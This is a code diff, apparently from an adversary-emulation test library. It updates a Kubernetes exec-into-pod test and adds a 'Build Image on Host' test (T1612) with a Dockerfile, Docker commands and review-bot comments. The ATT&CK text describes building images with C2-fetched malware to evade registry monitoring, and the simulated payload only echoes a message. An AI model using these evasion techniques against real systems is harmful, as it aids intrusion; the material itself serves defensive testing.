|
||||
| namespace | K8s namespace to use | string | default|
|
||||
| command | Command to run | string | uname|
|
||||
| path | Path to busybox.yaml file | string | $PathtoAtomicsFolder/T1609/src/busybox.yaml|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
kubectl create -f src/busybox.yaml -n #{namespace}
|
||||
kubectl create -f #{path} -n #{namespace}
|
||||
# wait 3 seconds for the instance to come up
|
||||
sleep 3
|
||||
kubectl exec -n #{namespace} busybox -- #{command}
|
||||
```
|
||||
|
||||
|
||||
@@ -16,6 +16,10 @@ atomic_tests:
|
||||
description: Command to run
|
||||
type: string
|
||||
default: uname
|
||||
path:
|
||||
description: Path to busybox.yaml file
|
||||
type: string
|
||||
default: $PathtoAtomicsFolder/T1609/src/busybox.yaml
|
||||
dependencies:
|
||||
- description: |
|
||||
kubectl must be installed
|
||||
@@ -25,7 +29,9 @@ atomic_tests:
|
||||
which kubectl
|
||||
executor:
|
||||
command: |
|
||||
kubectl create -f src/busybox.yaml -n #{namespace}
|
||||
kubectl create -f #{path} -n #{namespace}
|
||||
# wait 3 seconds for the instance to come up
|
||||
sleep 3
|
||||
kubectl exec -n #{namespace} busybox -- #{command}
|
||||
cleanup_command: |
|
||||
kubectl delete pod busybox -n #{namespace}
|
||||
|
||||
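Review bot: The new `path` default `$PathtoAtomicsFolder/T1609/src/busybox.yaml` (first hunk, `default:` line) spells the runner variable with a lowercase `t`, whereas the convention elsewhere in this repository is `PathToAtomicsFolder`; bash variable names are case-sensitive, so under the `bash` executor this expands to `/T1609/src/busybox.yaml` and `kubectl create -f` fails. Change the default to `$PathToAtomicsFolder/T1609/src/busybox.yaml` (the Markdown table carries the same value and, if it is generated, will follow). `kubectl exec` and `cleanup_command` still target the hard-coded pod name `busybox`, so a caller who points `path` at a different manifest gets a pod that is never exec'd into or deleted; the argument description should state that the manifest must create a pod named `busybox`.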
@@ -5,10 +5,10 @@ metadata:
|
||||
spec:
|
||||
containers:
|
||||
- name: busybox
|
||||
image: busybox:stable
|
||||
imagePullPolicy: IfNotPresent
|
||||
image: busybox
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- while true; do sleep 30; done;
|
||||
restartPolicy: OnFailure
|
||||
restartPolicy: OnFailure
|
||||
|
||||
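Review bot: The side that reads `image: busybox` with `imagePullPolicy: Always` drops the tag, so the pod resolves `busybox:latest` and pulls it on every run; the test is then non-reproducible and fails outright in clusters without registry egress. If the intent is to always refresh the image, keep a pinned tag alongside the policy, `image: busybox:stable` with `imagePullPolicy: Always`; if the intent is offline reuse, keep `IfNotPresent`. Which of the two image/policy pairs is the new side is inferred from print order only, so please confirm before applying.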
@@ -0,0 +1,67 @@
|
||||
# T1612 - Build Image on Host
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1612)
|
||||
<blockquote>Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
|
||||
|
||||
An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. </blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Build Image On Host](#atomic-test-1---build-image-on-host)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Build Image On Host
|
||||
Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** 2db30061-589d-409b-b125-7b473944f9b3
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
docker build -t t1612 $PathtoAtomicsFolder/T1612/src/
|
||||
docker run --name t1612_container -d -t t1612
|
||||
docker exec t1612_container ./test.sh
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
docker stop t1612_container
|
||||
docker rmi -f t1612
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `sh`!
|
||||
##### Description: Verify docker is installed.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
which docker
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
```
|
||||
##### Description: Verify docker service is running.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl status docker --no-pager
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl start docker
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -0,0 +1,30 @@
|
||||
attack_technique: T1612
|
||||
display_name: "Build Image on Host"
|
||||
atomic_tests:
|
||||
- name: Build Image On Host
|
||||
auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
|
||||
description: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: |
|
||||
which docker
|
||||
get_prereq_command: |
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: |
|
||||
sudo systemctl status docker --no-pager
|
||||
get_prereq_command: |
|
||||
sudo systemctl start docker
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1612 $PathtoAtomicsFolder/T1612/src/
|
||||
docker run --name t1612_container -d -t t1612
|
||||
docker exec t1612_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1612_container
|
||||
docker rmi -f t1612
|
||||
name: sh
|
||||
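Review bot: The cleanup stops `t1612_container` but never removes it, so the container name stays allocated and a second run fails at `docker run --name t1612_container` with a name conflict, while the following `docker rmi -f t1612` only untags an image the stopped container still references. Change the cleanup to `docker rm -f t1612_container` followed by `docker rmi -f t1612`, or add `docker rm t1612_container` between the two existing lines. In `get_prereq_command`, `[ "" == ... ]` relies on the bash-only `==` operator; with `dependency_executor_name: sh` a POSIX `[` rejects it, so use `[ -z "$(which docker)" ]` or `[ "" = "$(which docker)" ]`. The same command appears in the T1612.md hunk above. On Debian/Ubuntu the engine package is `docker.io` rather than `docker`, so the apt-get branch likely installs the wrong package; worth confirming on a target host.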
@@ -0,0 +1,9 @@
|
||||
FROM ubuntu:20.04
|
||||
WORKDIR /
|
||||
LABEL key="CyberSecurity_project"
|
||||
RUN echo "CyberSecurity_project"
|
||||
RUN apt update && apt install -y git
|
||||
COPY test.sh /test.sh
|
||||
RUN chmod +x /test.sh
|
||||
ENTRYPOINT ["tail", "-f", "/dev/null"]
|
||||
|
||||
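Review bot: `RUN apt update && apt install -y git` installs git that nothing in this image uses, since test.sh only echoes, and `apt` warns that it has no stable CLI for scripts. Either drop the line, or use the scriptable form and clear the package lists so the layer stays small: `RUN apt-get update && apt-get install -y --no-install-recommends git && rm -rf /var/lib/apt/lists/*`. Pinning `FROM ubuntu:20.04` to a digest would make the build reproducible, and `LABEL key="CyberSecurity_project"` uses the literal key name `key`; a descriptive key such as `LABEL project="CyberSecurity_project"` reads better in `docker inspect`.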
@@ -0,0 +1,4 @@
|
||||
#!/usr/bin/bash
|
||||
|
||||
echo "You have been hacked"
|
||||
|
||||
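Review bot: The shebang `#!/usr/bin/bash` depends on bash living under /usr/bin, which holds on merged-/usr images but not on every base; the script uses nothing bash-specific, so `#!/bin/sh` is the portable choice. If bash is wanted for future edits, `#!/bin/bash` is the path present on every Debian and Ubuntu base.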
@@ -1291,3 +1291,14 @@ c3a377f9-1203-4454-aa35-9d391d34768f
|
||||
fb4151a2-db33-4f8c-b7f8-78ea8790f961
|
||||
adae83d3-0df6-45e7-b2c3-575f91584577
|
||||
e3ad8e83-3089-49ff-817f-e52f8c948090
|
||||
2db30061-589d-409b-b125-7b473944f9b3
|
||||
878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
06eaafdb-8982-426e-8a31-d572da633caa
|
||||
007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
|
||||